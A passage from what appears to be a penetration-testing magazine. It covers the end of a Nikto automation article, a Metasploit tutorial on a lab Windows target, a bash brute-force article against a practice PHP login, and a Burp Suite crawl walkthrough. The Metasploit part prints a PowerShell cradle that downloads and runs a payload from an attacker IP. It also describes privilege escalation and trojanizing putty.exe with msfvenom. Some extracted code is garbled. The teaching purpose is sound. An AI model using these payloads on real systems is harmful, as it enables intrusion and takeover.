faster and easier to understand. In a huge framework like the one we are trying to pursue, size becomes a
problem.
77
2. Second, Nikto does run a lot of tests and this will take some time. So we need to make sure we only use required
resources.
The command we are running from Nikto is – nikto -h {ip] -o nikto_{ip}.xml -Format xml
So, the code we have is pretty simple:
import os
class nikto:
def __init__(self, ip):
self.ip = ip
def nikto_scan(self):
os.system(f'nikto -h {self.ip} -o nikto_{self.ip}.xml -Format xml')
os.system(f'scp nikto_{self.ip}.xml zeususer@52.168.1.180:~/')
We create a class called nikto, with the __init__ function requiring just the IP to be provided (we get that from if_ports.py
checking the nmap xml files for web ports), run the Nikto command and finally upload the result to Faraday.
CONCLUSION
I really hope you enjoyed this approach and my goal here was to create a flexible program with Python that will allow you to
create most of the Mitre Att&ck attacks in an autonomous way, allowing you to focus on what’s important – finding bugs.
I know there are a couple of things missing from the code that I previously mentioned but I was out of time to submit to
publish. This way you have a challenge to continue my work.
All comments, ideas, suggestions are more than welcome and you can ping me on my email – brurod[at]gmail.com
78
MANUAL
PENTESTING?
AUTOMATE IT
WITH
METASPLOIT
THOMAS MOOSMÜLLER
Thomas Moosmüller is the CEO of BreakinLabs and a specialist in penetration testing,
vulnerability assessments, and social engineering. Thomas holds various certifications
including CISSP, C|EH, OSCP, OSCE, and has a Master’s degree in Informatics.
BreakinLabs is the creator of www.hackinlabs.com, a virtual environment that
recreates a company with many vulnerabilities and various subnets. Every customer
can practice the different exploit techniques on the different hosts with the help of
our courseware and some hints, if required.
Visit us on www.breakinlabs.com for penetration testing, live hacking, and consulting
or on www.hackinlabs.com to learn how hacking and penetration testing works for
yourself!
80
Manual Pentesting? Automate it with Metasploit
INTRODUCTION:
Metasploit is a heavyweight in the field of hacking and is an almost worry-free package. Metasploit's main focus is the
exploit phase of hacking, but it also provides useful tools in information gathering and can centralize it in one place.
WHAT IS METASPLOIT?
Metasploit is an open-source project and is currently developed and published by Rapid7. There is a free version of the
"Metasploit Framework" as a console tool and an additional paid version with some features such as a browser-based GUI
and further automation. I believe the free version is suitable for everyone who wants to learn with Metasploit. This article
refers exclusively to the free version of Metasploit.
It is a very comprehensive tool and includes the exploit framework as well as other tools for creating exploit code and
payloads.
Metasploit is a very comprehensive tool and includes the exploit framework and several different modules that can also be
used outside the actual Metasploit environment. This includes, in addition to the start of the Metasploit Console
("msfconsole"), the options of payload generation and encoding (msfvenom), the module especially for advanced Windows
exploits (msfrop), and an advanced payload with an in-memory DDL injection called "meterpreter".
INSTALLATION:
Since Metasploit is a standard program in penetration testing, it is already included in a large number of distributions (Kali
Linux, Parrot, etc.) and does not need to be installed separately. If this is not the case, there is a detailed manual on the
Rapid7 Github repository:
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
After installation, the Postgresql service must be enabled and started. The added database must also be initialized with the
command "msfdb init".
LAUNCH METASPLOIT:
The Metasploit Console can be started with the command "msfconsole". The start screen looks like this:
81
In addition to the version, the scope of exploits and other scripts contained in the database are also displayed.
SHOW COMMAND:
The show command can be used to display all the available modules. These are:
auxiliary (modules of the category scanner, sniffer, fuzzing, sniffing, etc.)
payloads (exploit code for remote connections)
encoders (mainly for AV-evasion of payloads by polymorphic encodings)
82
nops (extending payloads to meet a specific size)
exploits (exploits with payloads)
plugins (integrated programs like nessus, openvas, nexpose, etc.)
post (post-exploitation of compromised targets and pivoting deeper into a network)
info (shows info for a specific module)
SEARCH COMMAND:
Using search <search term> all modules are searched for the search term and displayed. Let's assume that you want to
exploit a Jenkins server. So you use "search jenkins" and check the output:
Metasploit has now found several different types of modules. The auxiliaries primarily relate to the collection of
information, which is also very clear from the descriptions (Scanner, Recovery, Enumeration). Starting with number five,
the various exploits follow, which are indicated with the corresponding Disclosure Date and Rank (probability of success).
The check refers to the fact that before the exploit, the server can be checked to see whether it’s vulnerable to this attack at
all. The last point refers to a post-exploitation that can read the user logins of Jenkins after a successful exploit.
The Search Command also supports the restriction of search results using "type:" and "name:". For example, we can use
this to search for all exploits that are suitable for Windows and directly exploit vulnerabilities of Windows itself.
83
EXAMPLE: EXPLOITATION PROCESS
Initial Exploit:
I would now like to show you the various functions of Metasploit using a direct example. For this purpose, I have installed a
Windows 7 system with Apache ActiveMQ.
As already mentioned, Metasploit also supports plugins, i.e. various other scanners and tools. One of these tools is nmap,
which we can now use directly from the framework and perform a portscan on the target:
I have limited myself to a specific default port here to keep the output clear. Nmap's scan found that an Apache server with
a Jetty servlet engine is running on the target machine. The http-title displayed already tells you what software it is.
So we use the "search" command shown earlier and specifically look for an exploit for ActiveMQ:
Finally, we are shown three exploits, all of which are marked as excellent and thus have a high probability of success. My
experience from past penetration tests tells me that we will have the best success with the third exploit
(apache_activemq_traversal_upload).
84
Insertion: use command
With the help of "use <module>" a specific module can be loaded. This is then directly available and can be filled with the
data of the target or executed directly.
We now use "use" to load the selected module, which is loaded with its default settings:
We have already learned about the "show" command. It also has the option of displaying the various options (parameters)
of an exploit. Often, some fields are already pre-filled here, which correspond to the default settings of the target.
ActiveMQ, for example, has the user "admin" with the password "admin" by default when installed. Likewise, Port and Path
are often not changed and thus specified.
The Options modules are directly related to the selected exploit and its required parameters, such as login data, paths, IP
addresses and ports, proxy servers, virtual hosts for downloading data, and much more.
The payload options refer to the type of exploit or how the connection to the target should be established. This can be done
through bind shells, reverse shells, web shells, meterpreter, and others.
Finally, the target must be specified. Here it is important to know whether you are attacking a Linux or Windows server or
the target is a specific type of web application.
We fill the required-marked options with our data, i.e. RHOSTS (the IP of the target) and LHOST (our IP for the reverse
shell, default payload java/jsp_shell_reverse_tcp), and execute the exploit with the command "exploit".
85
Very nice! We succeeded with the exploit and opened a command shell to our target. As you can see, we can directly execute
commands on the command line of the target and have the rights of a system user named "bobby". So at least the Apache
service has been somewhat secured and the administrator account has not been used.
Privilege Escalation:
Insertion: sessions
Metasploit makes it possible to work in multiple sessions in parallel and thus also to put active shells of the targets in the
background.
With the command "background" we can drop the shell and get back to the command line of Metasploit. All active shells
in the background and the corresponding information about them are shown by using "sessions -i". This includes the
ID of the shell, the type (i.e. what kind of shell it is), the information about the target system (operating system and version)
as well as the IP address of the target and the corresponding port.
"sessions -i <ID>" allows and eventually pushes the shell from the background back to the foreground and connects us
to it.
Under Type, we see that currently a "shell java/linux" is used. This sounds a bit strange, since we are using Windows,
but in the end, it is only a java shell. With the help of the java shell, we can execute some commands on the system, but that
doesn't really help us. After all, our goal is to crack the administrator account and take over its rights.
86
To do this, we use a script called "web_delivery". This script allows us to use a command in a command interpreter (for
example, Powershell, Python, or the command line) to execute a command that downloads a Trojan from our machine and
executes it at the target.
So we first display the options so that we know exactly how the tool works and which parameters have to be set.
Fine, SRVHOST and SRVPORT tell us that something is being downloaded from our current IP on port 8080. We are not
using SSL and a randomly generated folder is absolutely sufficient for our purposes. Now, for the payload, a Python
Meterpreter payload is suggested. Unfortunately, this is not as powerful as a real Windows Meterpreter payload, so we
change it. Afterward, we have to define the IP Meterpreter should connect to and the port the reverse shell should be
opened to.
Now there is the field "target". Using "show target" we can display the corresponding targets:
87
For our purpose, Powershell, the standard Windows tool, is highly suitable. So we use the number two as the target.
Then we run the script with the command "run".
We are given a rather cryptic command to execute on the target computer:
It is a base64 encoded character string where Powershell is used to download the payload from your own machine:
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$n=new-objec
t net.webclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne
$null){$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.Credential
Cache]::DefaultCredentials;};IEX ((new-object
Net.WebClient).DownloadString('http://192.168.150.166:8085/Vc3TT9xumfRg/EuNTe0ltjSydvE'));
IEX ((new-object
Net.WebClient).DownloadString('http://192.168.150.166:8085/Vc3TT9xumfRg'));
So we execute the string on the target system ...
88
... and get a meterpreter reverse shell with a few seconds delay, which we can check with "sessions -i".
Insertion: Meterpreter
Meterpreter is a complete Trojan with a variety of tools that could fill a separate article. Meterpreter works with an
in-memory DDL injection and can be migrated between different services. It resides exclusively in memory and is not
stored on a disk. Communication between the controller and Meterpreter is encrypted using SSL. This makes the
traceability of Meterpreter attacks correspondingly more difficult. Meterpreter is used for privilege escalation, port scans,
traffic redirection, and also for data downloads and uploads, and much more. More information about Meterpreter can be
found at the link: https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
Metasploit has a script that checks for various exploits based on the target system and its patch level and returns a list of
exploits that may work.
We use the search again for this and then load the local_exploit_suggester tool. After passing the session, we can directly
search and display the exploits:
89
A quick check of the displayed exploits on Microsoft's website reveals that all Windows versions from the last few years are
affected by exploit CVE2019-1458 and the target system is most likely vulnerable:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458
Therefore, we use this exploit and load it into Metasploit. The display of the options shows that only the listener port of our
system must be set accordingly, and the session stored in the background has to be loaded:
90
We then run the exploit:
Wonderful! We see that the exploit re-checked the system for vulnerability and then loaded the exploit using notepad.exe.
Finally, a new Meterpreter session was loaded via a second stage.
Using "getuid", Meterpreter can show us the permissions of the active account:
Perfect! We have even exceeded our goal of the administrator and have "NT AUTHORITY\SYSTEM" the very highest rights
that are possible with a Windows system.
Using Meterpreter, we can also, for example, create screenshots or open a normal command shell and use it:
91
MSFVENOM:
Another part of Metasploit is the stand-alone tool "msfvenom", which was created from the former "msfpayload"
(generation of shellcode) and "msfencode" (encoding of shellcode).
With msfvenom, both parts have been combined and merged into one tool that offers a wide range of possibilities from
generating simple shellcode to creating polymorphic Trojans.
There are about 550 different payloads available, which can be displayed with "msfvenom -l payloads".
As a small example:
92
The payloads range from different connection types, web shells (php, java, aspx, etc.), different operating systems
(Windows, Linux, Android, MacOS, etc.) to different architectures (x86, x64). So-called stageless and staged shellcodes can
also be generated.
For staged shellcodes (notation with slash /, for example, windows/shell/reverse_tcp), a small dropper is created that
reloads the primary shellcode on the target machine. Stageless shellcodes (notation with underscore _, e.g.
windows/shell_reverse_tcp) create the complete shellcode at once.
As an example, the creation of a Stageless Meterpreter Reverseshell as an .exe is shown here:
-p windows/meterpreter/reverse_tcp means that the payload meterpreter for Windows is used and
should open a shell as a response via TCP.
LHOST/LPORT are the IP address and the port of the computer which should accept the response of the
meterpreter shell.
-f is the output format. In this case .exe for Windows.
> spl0it.exe means a redirection of the shellcode, which is normally printed in the console, into a new file.
However, we can also introduce this type of Trojan into an existing program.
Let's take a tool that very many of you probably know: putty.exe
First, we Trojanize the tool using msfvenom and a normal Windows reverse shell.
New parameters are "-x", which specifies the file to be Trojanized, "-k", which starts the Trojan as a separate thread on the
target so that the running program is not interrupted, and "-o", which is a different notation for ">", i.e. the output as a file.
93
Now we start a Netcat listener and transfer the file to the target (in the professional area: e.g. through social engineering):
After launching Trojanized Putty, we do not see anything noticeable at the target. The software itself also works properly
and will not cause any errors.
However, our Trojan was running in the background and it connected to the attacker's computer and opened a command
shell:
Msfvenom can be used for creating custom exploits in addition to this topic.
94
Let us assume that we have created an exploit for a web server and now we need a suitable shellcode for the intrusion. With
the help of msfvenom, we can create it within minutes.
The command remains almost the same - only the format of exe changes to py (Python) and we can use "-b <hex>" to
filter out the so-called bad characters that would normally crash the exploit.
A special feature, in this case, is the use of a polymorph-encoder for our shellcode. Did you notice
"x86\shikata_ga_nai" in the 6th line?
This very tool changes the displayed shellcode every time msfvenom is executed by using similar hex-encoded commands
that perform the same action.
I have run the same command again in the screenshot below - do you see the difference?
95
CREATE YOUR OWN METASPLOIT MODULES
Metasploit is rounded off with the possibility of attaching or editing your own exploits as a module.
Rapid7, the company behind Metasploit, has only very limited documentation on the inner workings of their tool. There are
four main sources to find out how to write an exploit using the Metasploit abstracted functions.
1. The Rubydoc on Metasploit Documentation for rapid7/metasploit-framework (master) (rubydoc.info)
2. The Metasploit Github: GitHub - rapid7/metasploit-framework: Metasploit Framework
3. The Offensive Security articles Creating Our Auxiliary Module - Metasploit Unleashed
4. Other modules that are already part of Metasploit
From the second one, we get the paths where the modules are saved on the filesystem, at least on Kali Linux.
96
Your new module will end up in one of these folders from where it can be called inside msfconsole.
You also could find some blueprints in the folder “exploits” as ruby files.
Here we will have a look at the web app exploit example.
The file is split into three sections that make up most Metasploit modules. An initialization function, a check function, and
the exploit function. There you describe the exploit and its nature, check the web app for the vulnerability, and exploit it, in
that order.
Initialization:
97
This part is mostly self-explanatory and well documented in the file. Give the name, the description, and the license the
exploit is supposed to have. List yourself as the author and references to CVE or ExploitDB. Lastly, give details about the
platform the web app is running on and if the exploit gives you privileged access.
The only available documentation on the used classes is on the rubydoc.
Class: Msf::Exploit::Remote
Module: Msf::Exploit::Remote::HttpClient
98
Under “register_options”, all important parameters can be specified that are needed for the exploit to run. In this
exploit, the web URL and the login data play an important role.
Check
Before an exploit is executed by Metasploit, it is checked by a check routine to be specified. This can be, for example, a
special response from the webserver or an existing banner on a port. Mostly this consists of an accessibility and version
check. The "Rex" and "Gem" classes can be explored in the rubydoc. For example, the class Rex::ConnectionError:
Exception: Rex::ConnectionError - Documentation for rapid7/metasploit-framework (master)
(rubydoc.info).
99
Exploit
This is the main part of the module. For web apps, this part usually consists of one or two steps. Often, something is
prepared first, so for example, the exploit authenticates itself or navigates to the page once to get a certain cookie. The
second part is the HTTP payload. This is usually a POST request for a php shell upload or a GET request for the execution of
a php command on the webserver.
100
Example: translating an exploit to a working Metasploit module
Here we will have a look at the Textpattern 4.8.3 Authenticated PHP Shell upload. The Python source code is available on
ExploitDB. Let’s start with creating the ruby exploit file and filling in all the obvious things in the Metasploit Exploit.
We start with a copy of the "example_webapp.rb" and store it under "exploits/unix/webapp".
101
It is best to fill in the fields in such a way that you can later quickly identify which exploit it is and how it works.
Textpattern does not display its version to unauthenticated users as any modern web app should. So for the check, we can
simply see if the HTTP server can be reached.
Here I just use the methods provided by the example file. As always, these Classes and Functions can be explored via the
rubydoc or on the Metasploit GitHub repository. For example the fail_with function: Class: Msf::Exploit — Documentation
for rapid7/metasploit-framework (master) (rubydoc.info).
Now to the main part of the module. The exploit. First, we have to understand how it works by looking at the Python source.
102
So it seems like the exploit authenticates with the user-provided credentials and uploads a php shell via the backend. The
first interesting function is login.
Here the session s and an authentication string _txp_token are retrieved.
103
While I was testing the exploit, which is something you should always do before trying to convert it to Metasploit, this part
didn’t seem to work. The _txp_token was not an HTML class of an <input> element on the entire page. But there was a
Json string at the beginning of the page that did. Another exploit TextPattern CMS 4.8.3 - Remote Code Execution
(Authenticated) - PHP web apps Exploit (exploit-db.com) had a method that worked. So I replaced it here.
Let’s translate this logic to Ruby. We can use the existing form in the web app example to log in. Sending HTTP requests is
done via the Metasploit internal send_request_cgi() function.
Input parameters from OPTIONS are stored in the datastore dictionary. One difference to note here is that in contrast to
the Python requests library, the send_request_cgi() function saves no context. So any cookies you obtain from one request
have to be saved separately and manually resent with the next request. send_request_cgi() RubyDoc
The second part of the Python exploit seems to be an upload of a blog post with a long lorem ipsum filler text followed by
the php shell.
104
The post request seems to contain many options necessary for the request, including our obtained _txp_token.
Here it is helpful to see what the Python generated HTTP POST request looks like exactly. A command line tool named
“proxychains” with the use of Burp Suite helped me here. The config file for proxychains is under
/etc/proxychains.conf. Add the Burp Suite HTTP proxy as the standard configuration:
Now run the exploit with proxychains:
Now we have a request to test our ruby module against:
105
Let us run our existing module with just the check and see what it does in Burp Suite: Automated running of the msfconsole
is key here. We are using bash scripts, resource scripts, and proxychains here:
Now just running ./run.sh handles everything for us. We see our modules correctly authenticate:
106
Two things are left to be translated to the Ruby Metasploit Module:
1. Grab the _txp_token from the logged in admin backend page
2. Post the payload
The txp_token can be grepped via a RegEx and substring methods to get the token itself:
The rest is part of the example web app exploit with minor tweaks, like sending the cookies we grabbed earlier and adding
all the HTTP POST parameters.
And that’s it. Metasploit automatically generates a payload according to the ARCH type we set in the initialization method.
It’s accessible via payload.encoded. It also automatically starts a listener that responds to said payload type.
The only thing left to do is run the exploit and test whether we get a Meterpreter shell.
Our module is included in the Metasploit folder, but needs to be initialized appropriately before it is recognized correctly:
107
Next, we fill the parameters of the exploit accordingly and add the missing values.
Now we just run the exploit…
Wonderful, we got our meterpreter reverse shell as planned and can go further to exploit the system.
108
Summary
So, the key steps of creating a Metasploit module are:
1. Find or write an exploit that works in a language you understand.
2. Search an existing module that works similarly to your new one.
3. Copy the .rb file to the correct place.
4. Change the initialization() method fields.
5. Use the resources listed under “Basics” and other online sources like stackoverflow to translate the exploit logic
to ruby and the Metasploit ecosystem.
CONCLUSION:
Now you should have a small overview of the advantages and the automation methods of Metasploit. As you can probably
guess, this is only a small part, because the complete topic of Metasploit can fill whole books.
I hope I was able to inspire you on this exciting topic and wish you a lot of fun trying it out yourself!
How about the legal use of Metasploit in a real scenario within a virtual company network? You can find the link and a
coupon code in the author's section.
References:
1. https://www.exploit-db.com/exploits/48943
2. https://www.exploit-db.com/exploits/49620
3. https://www.rubydoc.info/github/rapid7/metasploit-framework/index
4. https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458
109
BUILD YOUR
OWN BRUTE
FORCE TOOL
DANIEL GARCÍA BAAMEIRO
Daniel García Baameiro is passionate about hacking. A computer engineer
from the Complutense University, he holds a master's degree in
cybersecurity from the Carlos III University and is certified by the OSCP.
During his professional career, he has dedicated himself exclusively to the
offensive side.
Currently, he teaches the subject "Offensive Security" at the International
Graduate School and works as a Red Team for the company ISDEFE.
If you liked the article, don't hesitate to give him feedback! He will
appreciate it very much: daniel@garciabaameiro.com
His website is the following: http://garciabaameiro.com
111
Build Your Own Brute Force Tool
DEDICATION
I would like to dedicate this article to Pablo, my ex-boss and my friend. For those good times, for those laughs, and for the
epic jobs we've done, those CTF afternoons are still pending!
INTRODUCTION
When performing a web audit, one of the first challenges you will face is access through a login portal. These portals have
been implemented to protect the private part of a website from the public part. Usually, it is in
the private area where sensitive private information or even an administrator's own functionalities that allow the
management and editing of the website can be found.
In order to try to gain access to the private part of a website, brute force attacks tend to be used. These attacks are carried
out by using a dictionary of possible usernames and passwords of a website. If valid credentials are found, access has been
gained.
This article aims to help users understand how web portals work so that they can then create their own tool in the
programming language they feel most comfortable with.
BASIC KNOWLEDGE
Before we get down to the practical part of this article, it is important for the reader to be aware of certain definitions.
HTTP protocol
The HTTP protocol is a hypertext transfer protocol through which information can be transmitted. This protocol is mainly
used for web browsing on the internet. When a user accesses a website such as
"https://garciabaameiro.com", several HTTP requests are generated, requesting content from the web server...
112
113
...which issues an HTTP response with the requested information.
HTTP Methods
These requests can be differentiated through the following HTTP methods:
GET: this method is used to send information to a web server. By default, the web queries of a user browsing the
internet are sent via this method.
POST: this method is used to send information to a web server. It is mainly used when you do not want the data
exchanged via parameters to be sent in the URL address itself.
PUT: this method is used to upload files to the web server.
DELETE: this method is used to delete files from a web server.
HEAD: performs the same task as the GET method but to facilitate the HTTP response. That is to say, this method
is only used when you only want to obtain the status code of a web page without consulting its content.
All these methods can be consulted through the OPTIONS method. It is important to note that there are more methods
apart from those explained above, such as the TRACE method.
GET method
As explained in the previous section, the GET method is used to send information to a web server. When parameters need
to be sent, they are written in the URL itself. As an example, the following GET request is presented without HTTP headers:
GET /index.php?param1=data&param2=data
POST method
The POST method, like the GET method, is also used to send information to a web server. Unlike the GET method, the
parameters are not written in the URL itself, but are transmitted in the body of the request.
As an example, the following POST request is presented without HTTP headers:
POST /index.php
param1=data&param2=data
HTTP headers
HTTP headers provide further information to an HTTP request. It is necessary to make use of some of these
114
headers for the correct exchange of information between a client and a server. The following are some of the most
important HTTP headers, including those that must be taken into account when you want to make use of a brute-force
script:
User-Agent: this header contains information about the browser, operating system, versions, etc., of the user
making a request.
Host: this header hosts information about the domain name or IP address of a web server.
Referrer: this header indicates the address from which a user comes from.
Cookie: this header allows the cookies used in a connection to be exchanged.
Authorization: this header hosts the authorization/authentication credentials.
PLATFORM
This article is intended to be a practical article to guide the reader in developing their own brute force tool. In order to do
so, it is necessary for the reader to create their own test scenario.
This scenario will consist of a simple login portal written in php running on a server such as Apache or Nginx. To create it,
the user must install a server such as Apache using the following commands:
sudo apt install apache2
sudo systemctl start apache2;
After that, you only have to copy the code shown in the following section into an "index.php" file and place it in the
following path:
/var/www/html/index.php
The display of this file once a web server is up is shown below:
115
PHP file
The first interface consists of a file named "index.php". This file hosts the form on which a brute-force attack is to be
performed. This form issues a POST request that sends the data to the file itself. If the data is correct,
the user will be able to access. Otherwise, an error message is displayed.
<?php
if (isset($_POST['username']) && isset($_POST['password'])) {
$username = strtoupper($_POST['username']);
$password = strtoupper($_POST['password']);
if($username == "HAKIN9" && $password == "HAKIN9"){
header("Location: https://youtu.be/LlhKZaQk860");
exit();
?>
<html class="" lang="en-US">
116
<head>
<link rel="shortcut icon"

href="https://hakin9.org/wp-content/uploads/2015/03/favicon.ico">
<link rel="icon" type="image/png"

href="https://hakin9.org/wp-content/uploads/2015/03/favicon.ico">
<title>Hakin9 - Brute Force Training</title>
<link rel="stylesheet"
href="https://hakin9.org/wp-content/cache/min/1/743154e87f3df0533705fc7abc44d9b4.css"
media="all" data-minify="1">
</head>
<body
class="home-page bp-legacy home page-template page-template-notitle page-

template-notitle-php page page-id-1427 theme-wplms woocommerce-js wc-shortcodes-
font-awesome-enabled d5 g2 c6 minimal logged-out elementor-default elementor-kit- 164858">
<header>
<div class="pop_login" id="vibe_bp_login" style="display: block; top:
-100px;"> <div class="popup_overlay"></div>
<div class="popup_login">
<form
name="login-form"
id="vbp-login-form"
action="./index.php"
method="post"
class="standard-form">
<div
class="inside_login_form">
117
<div class="inside">
<?php
if (isset($_POST['username']) &&
isset($_POST['password'])) {
strtoupper($_POST['username']);
strtoupper($_POST['password']); $username =
$password =
echo '<span>'.$username.' '.$password.'</span>';
if ($username == "HAKIN9" &&
"HAKIN9"){ $password !=
echo '<span style="color:

red; text-
align: center;display: block;">WRONG PASSWORD</span>';
118
119
ANALYSING THE LOGIN
In order to build our brute force tool, we must first understand what we are dealing with. The easiest way to do this is to
play with the login portal. This means that our main goal is to try different values on its fields and see how it reacts.
In many cases, a user enumeration or a credential collection starts with brute force attacks using the errors
displayed to the user through the login portal. Therefore, the objective is to try to see the types of errors that occur in the
portal and exploit them to perform brute force attacks until valid credentials are obtained.
Analysing the login portal and introducing some test credentials such as the user name "test" and the password "test", it is
observed that the following HTTP request is generated:
This request can be consulted through the browser's "Web Developer Tools", which can be invoked by means of the
character combination "Ctrl+Shift+I". In Mozilla Firefox, the menu option we are interested in is the
Network section. By opening this option and pressing the "LOG IN" button to send credentials, several requests will be
made, including the one shown above. We can export the generated request to a format recognisable by the system or
usable.
120
This returns the following information as a result via the website:
121
Taking into account this data, where we have managed to identify error messages, it is time to move on to the creation of
our tool. The steps will be simple, we need to generate a request to the portal and compare the results returned.
BRUTE FORCE TOOL
The language chosen for the creation of this tool is a scripting language known as Bash. We can make use of it through a
GNU/Linux distribution or by installing it on a Windows operating system.
As a first step, we need to make HTTP requests. To do this, we are going to make use of the CURL command. This
command allows us to send requests as well as to indicate the method or to add HTTP headers and parameters. Looking at
the previous section where we exported the request, we can see that we can export it in CURL format. This export results in
a response similar to the one shown below:
For our case, we have found that most of the HTTP headers present in the request are not necessary. This is why we have
cleaned up the request, leaving it in the state shown below:
122
Remembering the section on the analysis of the login portal, we know the following:
• In case of failure in the user and password, a message appears indicating the sentence WRONG CREDENTIALS.
• In case of failure only in the password, a message appears indicating the sentence WRONG PASSWORD.
• In the case of having both parameters right, no message is displayed, since access to the portal has been gained.
Keeping this in mind, we will only have to save the response of the request made and compare its result with the different
error messages. To do this, we will write the following lines in our script filtering the response with the word "WRONG" and
muting the request by CURL:
It is important to add a dictionary to avoid using the same username and password. To do this, the reader is suggested to
create a text file with the name "dictionary.txt" containing the following lines:
123
This file will be read line by line where, for each line, a new request will be made. The script would look like this at this
stage:
It only needs to be fixed so that when the user is correct it only appears once and when it finds the password the loop and
the script ends. To make it more attractive, we will include colours during the execution. And, of course, we can't miss the
ASCII ART
The final script, which we will host in a file named "script.sh" and give permissions to run it with the command
chmod +x script.sh, would look like this:
124
The execution is shown below:
125
Of course, this can be extrapolated to other languages. The goal is the same, to compare error messages until you find the
one that is different. If the difference is because access to the login portal has been gained, valid credentials have been
obtained.
REFERENCES:
1. Bash Reference Manual:

https://www.gnu.org/savannah-checkouts/gnu/bash/manual/bash.html
2. Bash Introduction for Hackers Part 1: https://hakin9.org/bash-introduction-for-hackers-part-1/
3. Bash Introduction for Hackers part 2: https://hakin9.org/bash-introduction-for-hackers-part-2/
126
CRAWLING
WEBSITES
USING BURP
SUITE
MAYUKH PAUL
I am a typical college student with a keen interest in the field of
cybersecurity and social engineering. The art of psychologically
manipulating people into performing actions or divulging
confidential information intrigues me.
I enjoy trying out new tools and exploiting new vulnerabilities.
The more vulnerabilities I exploit, my urge to learn increases.
I aim to dive more into the field of cybersecurity research and
protect company security against cyber threats.
128
Crawling Websites Using Burp Suite
Burp Suite is a platform created by PortSwigger consisting of various security tools used to perform web application
penetration testing. These tools consistently work together to complete the testing process from analyzing surface attacks to
finding and exploiting vulnerabilities.
Some of the security tools in Burp Suite are:
Target: This tool contains detailed information about the target application.
Proxy: This tool intercepts a web proxy that operates as a man-in-the-middle between the target web application
and the end browser.
Intruder: This is a customizable tool for carrying out attacks against web applications.
Repeater: This tool manually manipulates and reissues HTTP requests, and analyzes the site’s response.
Sequencer: This tool can be used to analyze an application’s session tokens that are intended to be random.
Decoder: This tool is used to convert raw data into hashed and encoded forms.
Comparer: This tool is used to compare two data items.
And many more.
In this article, I am going to use Burp Suite to crawl and audit a website..
1. Click on ‘New scan’ to open up the scan configuration window.
2. In the new scan window, we specify the target website. There are two scan types:
2.2. Crawl
2.3. Crawl and Audit
129
Here, I will demonstrate a default Crawl and Audit Scan and the website I used is ‘http://testphp.vulnweb.com/’. This is a
vulnerability demonstration website for Acunetix Web Vulnerability Scanner.
The scan protocols can be customized further. The target can be scanned using HTTP and HTTPS protocols or can be
manually customized using specified protocols.
3. The scope of the scan can be further configured. The scanner, by default, starts scanning from the URL provided but
here, further prefixes that should be included or excluded during the scan were added.
130
4. We further configure the scan for crawling and auditing the target. First, under ‘scan configuration’, select ‘new’
to configure the crawling feature.
5. In the crawling scan configuration window, we define the behavior of the scan as preferred.
131
Let’s look further into the configuration option here:
• Crawl Optimization: Here, we can control the link depth and crawl strategy to one’s preference if one prefers
speed or deep coverage.
• Crawl Limits: Under crawl limits, one can set for how long the crawl should occur or the maximum number of
requests and locations it will crawl.
132
• Login Function: If any user registration is found, the crawler will attempt to self-register a user using the login
credentials during the scan. Also, login failures can be triggered using invalid credentials to access the behavior that
occurs when a login failure happens.
• Handling Application Errors During Crawl: This feature controls how the scanner handles errors, if any. One
can configure a number of consecutive requests timed out before pausing a task.
• Miscellaneous: This lets one configure the scan further such as submitting forms, requesting robot.txt files, parse
API definitions, request site maps, etc.
133
6. Next, we look further into the ‘auditing’ menu.
7. The below figure summarizes the configuration options in the auditing menu.
8. Let’s look into some of the configuration options:
• Audit Optimization: This feature lets one optimize the auditing behavior according to their requirement. Further
modifications can be made in audit speed, audit accuracy, redirections and automatically maintaining sessions.
134
o Issues Reported: This feature controls the issues Burp Suite will report. The issue reporting can be selected
by:
▪ Scan Type:
▪ Individual Issues:
135
• Handling Application Errors During Audit: This feature controls how the scanner handles transmission
timeouts and connection failures. The number of failed audit checks, number of failed insertion points, etc., can be
configured further.
• Insertion Point Types: This feature controls the placing of insertion points into HTTP requests during an audit.
Insertion point categories like URL and body parameter value, cookie values, HTTP header, etc., can be configured.
• Modifying Parameter Location: This feature lets the scanner shift parameters to other locations within the
request, at the same time testing them in their actual position.
136
• Ignored Insertion Point: This feature lets one specify for which parameter the scanner should skip audit checks.
• JavaScript Analysis: This feature lets the scanner detect DOM-based JavaScript vulnerabilities.
9. The scan can be configured by different built-in extensions to create a generic desired scan.
137
10. Next, the option in the menu is ‘Application Login’. This feature uses the manually entered login credentials to
automatically check if login attempts can succeed when the crawl or audit comes across a login form.
138
Log in credentials can be manually entered or pre-recorded data from the browser’s extension can be used.
11. Last in the configuration menu is ‘Resource Pool’. This lets one configure multiple throttle settings. Each pool
can be configured with the number and rate of requests.
139
12. Once the desired configuration is made, pressing the ‘OK’ button will initiate the scan.
13. Once the scan is in process, it will start crawling the target and in a while, the estimated time will be calculated
and displayed.
14. Once the crawling is completed, the audit is initiated automatically.
15. Under the Issue activity tab on the right side, all the discovered vulnerabilities of the target are shown. Clicking
on a specifically found vulnerability gives the details about it.
140
16. Once auditing is completed, further details from the scan can be viewed by clicking the view details tab.
17. On viewing details, we can find further options of the scan results:
Details: A summarized detail of the scan.
141
Audit items: Details of the performed audit.
Issue Activity: Displays the discovered vulnerabilities, which can be sorted according to priority.
142
Event log: Displays the occurred events including errors and details about them.
Logger: Detailed information about the performed scan log.
143
18. To view a detailed report of the scan we go to the ‘target’ tab, right-click on the target, and select Issue ->
Report issues for this host
144
19. Next, we select the format of the report.
20. The details required to be displayed can be specified.
21. The HTTP requests and responses can also be displayed on the report if required.
145
22. The issues required to be included in the report can be shortlisted in this menu.
23. Lastly, we provide the details and select the destination for the report to be saved.
146
24. Once everything is completed the report gets created.
25. The report displays detailed findings of the scan. The below images show some of the intel gathered from the
scan.
147
148
149
150
SOLVING AN
EXPERT LAB
FROM WEB
SECURITY
ACADEMY
MICHAEL SOMMER
Michael Sommer is a security consultant and pentester at
Consulectra Unternehmensberatung GmbH in Hamburg. He has
been involved in IT security since 2006 and his focus is on web
security, application security, cloud security and critical
infrastructure security. Michael runs a YouTube channel where all
the Web Security Academy labs are solved. Currently, there are
more than 300 videos here. Some of them are still without audio
commentaries, but these will be replaced gradually.
152
Solving An Expert Lab From Web Security Academy
INTRODUCTION
